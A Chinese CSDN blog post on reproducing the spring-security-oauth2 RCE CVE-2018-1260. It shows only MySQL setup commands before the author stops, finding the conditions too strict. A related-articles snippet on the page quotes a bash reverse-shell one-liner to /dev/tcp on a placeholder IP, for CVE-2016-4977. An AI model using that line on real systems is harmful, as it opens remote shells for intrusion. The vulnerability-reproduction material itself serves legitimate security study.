RCE with spring-security-oauth2漏洞复现(CVE-2018-1260)

最新推荐文章于 2024-09-18 02:31:30 发布
最新推荐文章于 2024-09-18 02:31:30 发布
阅读量1.1k 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/89678735
版权

参考:https://xz.aliyun.com/t/2330
https://cryin.github.io/blog/CVE-2018-1260%20spring-security-oauth2%20RCE%20Analysis/
初始化:先根据https://github.com/wanghongfei/spring-security-oauth2-example 将内容保存为init.sql文件,然后启动mysql:参考https://blog.csdn.net/caiqiiqi/article/details/89642032
然后载入sql脚本:

mysql -h127.0.0.1 -P3306 -uroot -p987654
mysql> source /Users/caiqiqi/repos/spring-security-oauth2-example/init.sql;

然后需要插入一条数据:

mysql> insert into oauth_client_details(client_id, resource_ids, client_secret, scope, authorized_grant_types, web_server_redirect_uri, authorities, access_token_validity, refresh_token_validity, additional_information, autoapprove) values('client', NULL, 'secret', 'app', 'authorization_code', 'http://www.baidu.com', NULL, NULL, NULL, NULL, NULL);

限制条件

由于Application中有一个设置scopes的地方。如果设置了白名单,则无法利用(其实大部分都设置了都,这样利用面就比较小了)。除非这个scopes没有设置,这样才能利用。

据说条件比较苛刻,就不继续复现了。

OAuth2.0中的安全漏洞及避免方法:使用OAuth2.01.0B协议实现
AI天才研究院
07-14 2297
作者:禅与计算机程序设计艺术 什么是 OAuth2.0? OAuth(Open Authorization)是一个开放授权标准协议,它允许第三方应用访问用户在某些网站上存储的私密信息,如照片、邮箱、联系方式等。OAuth 是建立在Oauth Core 1.0协议规范之上的一个子协议,该
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1732
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 Spring Security OAuth 支持使用标准 Spring 和 Spring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1285
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
Spring框架漏洞总结
最新发布
weixin_42492000的博客
09-18 686
目录SpEL注入攻击Spring H2 Database Console未授权访问Spring Security OAuth2远程命令执行漏洞(CVE-2016-4977)Spring WebFlow远程代码执行漏洞(CVE-2017-4971)Spring Data Rest远程命令执行漏洞(CVE-2017-8046)Spring Messaging远程命令执行漏洞(CVE-2018-127...
Spring Security入门3:Web应用程序中的常见安全漏洞
Designer 小郑的技术博客
11-14 1542
安全漏洞是指在计算机系统、网络系统或软件程序中存在的错误、缺陷或漏洞,可能被恶意攻击者利用,导致系统被入侵、数据泄露或服务被破坏。安全漏洞可以存在于操作系统、应用程序、网络协议、数据库系统等各个层面。攻击者可以利用这些漏洞来获取非法访问权限、执行恶意代码、篡改数据或者拒绝服务等。安全漏洞的发现和修补是保障系统安全的重要工作,而及时更新和修复已知的漏洞是保持系统安全的基本措施。
9.Spring security漏洞保护
EdSheeran的博客
03-21 8751
文章目录*漏洞保护**9.1CSRF攻击与防御**9.1.1CSRF简介**9.1.2CSRF攻击演示**9.1.3CSRF防御**令牌同步模式**`SameSite`**需要注意的问题**9.1.4源码分析**`CsrfToken`**`CsrfTokenRepository`**`CsrfFilter`**`CsrfAuthenticationStrategy`**9.2HTTP响应头处理**9.2.1缓存控制**`Cache-Control`**`Pragma`**`Expires`**9.2.2`X
Spring {Boot,Data,Security} 历史漏洞研究
有价值炮灰
05-01 322
前言 上篇文章 介绍了 Spring Framework 本身的一些核心技术点以及历史上出现过的几个典型漏洞,在其末尾我们说了,Spring 生态中除了框架本身,还有许多其他流行的项目。这些项目的文档和源码见: spring.io/projects github.com/spring-projects 本文即对其中几个比较知名的项目进行介绍,同时也会对历史上出现过的漏洞进行分析和回顾。 Spring Boot Spring Boot 是 Spring 的核心子项目,主要目的是为了简化新建 Spring
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5198
cve-2016-4977(spring-security-oauth) RCE漏洞复现
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)——漏洞复现
weixin_42090431的博客
11-27 150
bash -i >& /dev/tcp/你的ip/6666 0>&1(对这部分base64编码)
CVE-2016-4977 RCE in Spring Security OAuth漏洞分析
c0c0cf的专栏
09-21 2052
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述: When processing authorization requests using the whitelabel views, the response_type parameter value was executed
用Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 608
Docker复现SpringBoot CVE-2016-4977
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1376
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5622
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
【网络安全】Spring框架漏洞总结(一)
kali_Ma的博客
09-10 2679
Spring简介 Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
CVE-2022-31692 Spring Security Oauth2 Client权限提升漏洞
LJQClqjc的博客
11-03 1614
棱镜七彩漏洞深度分析
spring security oauth rce (cve-2016-4977) 漏洞分析
whatday的专栏
07-02 1074
背景描述 Spring Security OAuth 2016年以前有出一个CVE,这里写一个记录学习的东西。 漏洞详细 Spring Security OAuth官网有CVE-2016-4977的介绍,但是讲的不怎么清楚,就只是说了一下漏洞原理,我们就只知道是因为执行一个SpEL表达式https://pivotal.io/de/security/cve-2016-4977而产生的。看看利用的poc,大概了解一下整个过程。 http://localhost:8080/oauth/authorize?resp
Spring Security注销后未正确保存空的SecurityContext漏洞CVE-2023-20862
日拱一卒无有尽,功不唐捐终入海
08-30 2112
背景:公司项目扫描到 Spring-security 组件 注销后未正确保存空的SecurityContext CVE-2023-20862Spring Security是一个功能强大且高度可定制的身份验证和访问控制框架。它是保护基于Spring的应用程序的实际标准。Spring Security提供了一套完整的安全性解决方案,是构建安全性强的企业级应用程序的理想选择。
Spring Security存在认证绕过漏洞 CVE-2021-22096
日拱一卒无有尽,功不唐捐终入海
08-29 1115
背景:项目被扫到Spring Boot 的漏洞,严格的说应该是Spring Security 组件的漏洞,安全部门要求快速修复,查阅了一些资料,整理以下。CVE-2021-22096是一个针对Spring Security的安全漏洞。Spring Security是一个在Java应用程序中提供安全服务的框架,它提供了一整套的安全性功能,包括认证和授权等。
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977)
小小猪的博客
10-28 806
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977) 漏洞介绍: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令 环境复现: 在虚拟机中用vulhub靶场提供的docker容器来复现 jdk版本1.7 p
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值